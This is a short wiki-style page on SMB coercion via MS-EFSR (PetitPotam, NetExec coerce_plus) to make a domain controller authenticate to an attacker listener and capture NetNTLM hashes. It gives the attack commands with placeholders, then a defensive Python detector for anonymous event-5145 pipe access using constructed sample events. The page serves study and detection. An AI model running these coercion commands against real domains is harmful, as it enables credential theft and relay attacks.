SMB Coercing (445)

Basics

SMB coercing is a method to force the domain controller to authenticate against our host. With this attack we can capture the NetNTLM hash. There are currently multiple ways to coerce SMB authentication. A well-known method uses the Encrypting File System Remote Protocol (MS-EFSR) and the PetitPotam script. Other ways use Impacket's ntlmrelayx.py script. These will be added to this wiki in later versions.

Coercing can be thought of as a higher escalation level or advanced method of NTLM relaying. See:

NTLMRelaying (445)

Attacks

PetitPotam

Preparation:

Check if Responder is running

sudo responder -I <INTERFACE>

Coercing execution:

PetitPotam.py

python3 ./PetitPotam.py <DOMAIN> <LISTENER_IP> <TARGET_IP>

NetExec

nxc smb <ip> -u '' -p '' -M coerce_plus
nxc smb <ip> -u '' -p '' -M coerce_plus -o LISTENER=<AttackerIP>
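
Detection

The null-session coercion shown above leaves a trace on the target when "Audit Detailed File Share" is enabled. The following is an added example, not part of the original wiki or of any tool named here: it flags Windows Security event 5145 records where ANONYMOUS LOGON opens a pipe that carries MS-EFSR over IPC$. The pipe list, host names and sample events are assumptions constructed for illustration; coercion run with valid credentials is not covered by this check.

```python
from collections import defaultdict

# Assumption: named pipes over which MS-EFSR is commonly reachable; tune per environment.
EFSR_PIPES = {"lsarpc", "efsrpc"}
ANON_NAMES = {"ANONYMOUS LOGON"}

def is_coercion_candidate(ev, allowed_sources=frozenset()):
    """True if a parsed 5145 event is anonymous access to an EFSRPC-capable pipe."""
    if str(ev.get("EventID")) != "5145":
        return False
    share = ev.get("ShareName", "").lower()
    pipe = ev.get("RelativeTargetName", "").lower().lstrip("\\")
    user = ev.get("SubjectUserName", "").upper()
    return (share.endswith("\\ipc$")
            and pipe in EFSR_PIPES
            and user in ANON_NAMES
            and ev.get("IpAddress") not in allowed_sources)

def summarize(events, allowed_sources=frozenset()):
    """Group hits by (target host, source IP) so repeated attempts stand out."""
    hits = defaultdict(list)
    for ev in events:
        if is_coercion_candidate(ev, allowed_sources):
            hits[(ev["Computer"], ev["IpAddress"])].append(ev["RelativeTargetName"])
    return dict(hits)

# Constructed sample events (not real logs); field names follow event 5145.
DC, IPC = "dc01.example.test", "\\\\*\\IPC$"
SAMPLE_EVENTS = [
    {"EventID": 5145, "Computer": DC, "SubjectUserName": "ANONYMOUS LOGON",
     "IpAddress": "192.0.2.50", "ShareName": IPC, "RelativeTargetName": "lsarpc"},
    {"EventID": 5145, "Computer": DC, "SubjectUserName": "ANONYMOUS LOGON",
     "IpAddress": "192.0.2.50", "ShareName": IPC, "RelativeTargetName": "efsrpc"},
    # Authenticated account on the same pipe: not flagged by this check.
    {"EventID": 5145, "Computer": DC, "SubjectUserName": "svc_backup",
     "IpAddress": "192.0.2.10", "ShareName": IPC, "RelativeTargetName": "lsarpc"},
    # Anonymous access to an unrelated pipe: not flagged.
    {"EventID": 5145, "Computer": DC, "SubjectUserName": "ANONYMOUS LOGON",
     "IpAddress": "192.0.2.77", "ShareName": IPC, "RelativeTargetName": "srvsvc"},
    # Different event ID: ignored.
    {"EventID": 4624, "Computer": DC, "IpAddress": "192.0.2.50"},
]

if __name__ == "__main__":
    for (host, src), pipes in summarize(SAMPLE_EVENTS).items():
        print(f"{host}: anonymous EFSRPC pipe access from {src} via {sorted(set(pipes))}")
```

Pass known scanner or management addresses as allowed_sources to reduce noise.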
